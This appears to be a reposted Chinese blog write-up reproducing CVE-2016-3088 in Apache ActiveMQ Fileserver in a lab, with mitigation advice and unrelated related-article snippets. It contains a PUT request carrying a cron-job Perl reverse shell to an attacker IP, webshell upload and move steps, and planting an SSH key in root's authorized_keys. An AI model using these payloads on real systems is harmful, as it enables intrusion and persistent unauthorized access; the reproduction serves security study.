CVE-2016-3088

2023-10-15 06:50
文章标签 cve 2016 3088

本文主要是介绍CVE-2016-3088,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

CVE-2016-3088-Apache ActiveMQ Fileserver Web应用任意代码执行漏洞

漏洞描述

2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。

影响版本

Apache ActiveMQ 5.x ~ 5.14.0
12 - 14 版本默认关闭 fileserver
14 之后的版本取消了 fileserver

测试环境
靶机: 安装 5.12 ActiveMQ 的 Windows 10
攻击机:Kali

复现

在靶机上开启 ActiveMQ 服务 对配置文件进行改写

进入 conf 配置文件文件夹 改写 jetty.xml 文件 对控制 fileserver 功能内容注释取消

在这里插入图片描述

编写 Webshell 文件上传 fileserver 目录回显 204 表示成功上传 

在这里插入图片描述

查看 fileserver 文件夹 成功写入文件夹中也可直接访问路径进行测试 /fileserver/eval.txt

在这里插入图片描述
在这里插入图片描述

因为 Webshell 需要使用 jsp 格式文件 并进行执行操作才能够 getshell 所以需要查看能够执行 jsp 文件的路径 fileserver 路径下无法执行 jsp 文件访问 admin/test 查看根目录路径 

在这里插入图片描述

将刚上传的文件移动到能够执行 jsp 文件的文件夹中在此对目标文件进行访问 就可得到命令执行后返回的数据
计划任务反弹同上复现操作类似 同样对目标服务器进行 PUT 上传文件操作
PUT /fileserver/eval.txt HTTP/1.1
Host: IP:8161
Content-Length: 250*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="目标IP";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'注意:需要将写入文件的换行符改为 0a(linux 中的换行符)再对目标文件进行 MOVE 协议操作 移动到 /etc/cron.d 目录下使用 nc -lvp 9999 进行端口监听 等待回显即可、文件上传和移动 通过 BP 返回包查看是否上传,移动成功 返回 204 基本操作成功
上传 SSH 公钥使用 ssh-keygan -t rsa 生成密钥对
进入 /.ssh 目录下 查找生成好的密钥 id_rsa.pub同样进行上传 移动操作 移动到 /root/.ssh 目录下 并重命名为 authorized_keys通过 ssh 密钥链接进入服务器内部

修复

升级到 5.14 后的任意版本 5.14 后的所有版本取消了 fileserver 应用如升级会对目前业务持续性产生影响 可以对配置文件进行改写
改写 ActiveMQ 根目录下 conf 目录下的 jetty.xml 对 fileserver 行进行注释操作
http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

这篇关于CVE-2016-3088的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/216084

相关文章

vulhub GhostScript 沙箱绕过(CVE-2018-16509)

1.执行以下命令启动靶场环境并在浏览器访问 cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录   docker-compose up -d #启动靶场   docker ps #查看容器信息 2.访问网页 3.下载包含payload的png文件 vulhub/ghostscript/CVE-2018-16509/poc.png at

实践课堂|2016成都站|报名开始啦!

Hi,QingCloud 的小伙伴们,欢迎参加史上最有营养的云知识讲堂。 QingCloud 实践课堂系列开始于 2014 年末,在深圳、上海、广州、成都、杭州、北京六个城市,QingCloud 的研发工程师们同近千名 CIO 、架构师、开发者、运维工程师……分享了 QingCloud 的技术理念、功能特性和使用技巧,还有来自人民网、融云、泰捷视频、杏树林、友好速搭、百姓网、冰点、顺丰速运、洋葱

【网络安全】Jenkins任意文件读取漏洞及检测工具(CVE-2024-23897)

原创文章,不得转载。 文章目录 漏洞成因影响范围检测工具更多细节 漏洞成因 Jenkins CLI 接口存在任意文件读取漏洞(CVE-2024-23897)。该问题源于 args4j 库在解析文件名参数时,会将@符号后的字符串视为文件名并尝试读取文件,而且该功能默认处于启用状态。 影响范围 Jenkins weekly <= 2.441 Jenkins LTS <=

2016/9/11--一周的工作总结

自从九月一号开始上班到现在,现在总结一下自己的问题: 第一个问题:自己没有认真的解决问题! 刚去的第二天,施工给我了一张图纸,让我对电路图进行分析,我刚开始查了一些资料,也看了看但是一直不会做,后边就放一边了也不管了,自己一直说实习学不到东西,但是真正的问题来的时候,是否全力以赴的解决问题?这个问题你真的尽全力去解决了吗?回答是:不,我没有。我还不如一个本科的学生,我一直在逃避,一直没有

日记 01/27/2016.

有机会再看看这个: https://www.zhihu.com/question/27578379 想拿高package,多去拿几个offer再来谈,特别是hot startup的package,往往拿来要挟大公司的HR很好用。 最近在学习Angular JS,自己一定要坚持下来。然后把前端的知识补上。 打算Aug的时候,然后把Princeton的算法课上了,重新充电,然后把

2016年末程序员应该知道的基本架构思想

http://www.toutiao.com/i6352598153379709442/?tt_from=mobile_qq&utm_campaign=client_share&app=news_article&utm_source=mobile_qq&iid=6176041275&utm_medium=toutiao_ios

高教社杯数模竞赛特辑论文篇-2016年C题:电池剩余放电时间预测(附MATLAB代码实现)

目录 摘要 一、 问题重述 1.1 已知铅酸电池的基本情况与要求 1.2 需要解决的问题 1.2.1 问题 1 需要解决以下三点: 1.2.2 需要解决以下三点: 1.2.3 问题3需要解决: 二、问题分析 2.1 问题1 2.2 问题 2 2.3 问题3 三、模型假设与约定 四、符号说明及名词定义 五、模型的建立与求解 5.1 问题一的分析与求解 5.2 问题二的分析与求解 5.3 问题三的分

蘑菇街2016研发工程师编程题--回文串

题目 给定一个字符串,问是否能通过添加一个字母将其变为回文串。 输入描述: 一行一个由小写字母构成的字符串,字符串长度小于等于10。 输出描述: 输出答案(YES\NO). 示例1 输入 coco 输出 YES 解法1 使用动态规划,先看一下回文串的性质,如果一个字符串为回文串,那么翻转这个字符串以后跟原来的子串相同如下: 根据题目如果加一个字符就能使字符串成为回文串

网易2016研发工程师编程题--完全解析

前言 之前做公司的真题,碰到动态规划,还有一些数学性质的题目比较多一点。网易2016研发工程师编程题跟之前做的题目有很大的不同,不仅涉及到二叉树的编码,还涉及到图的广度遍历,最后还有一个快排。可以说这次的三个题目含金量非常的高,因此做了一下总结和分析。 1.比较重量 题目描述:小明陪小红去看钻石,他们从一堆钻石中随机抽取两颗并比较她们的重量。这些钻石的重量各不相同。在他们们比较了一段时间

mysql 与java 转换格式化格林威治时间(Tue Sep 13 00:00:00 CST 2016)两种方式

1  mysql 中处理 SELECT STR_TO_DATE('Thu Jul 20 15:04:03  2017','%a %b %e %T %Y %Y %Y') from dual ;   STR_TO_DATE(REPLACE('Tue Sep 13 00:00:00 CST 2016', '00:00:00 CST ', '') ,'%a %b %e %Y %Y %Y') 2 ja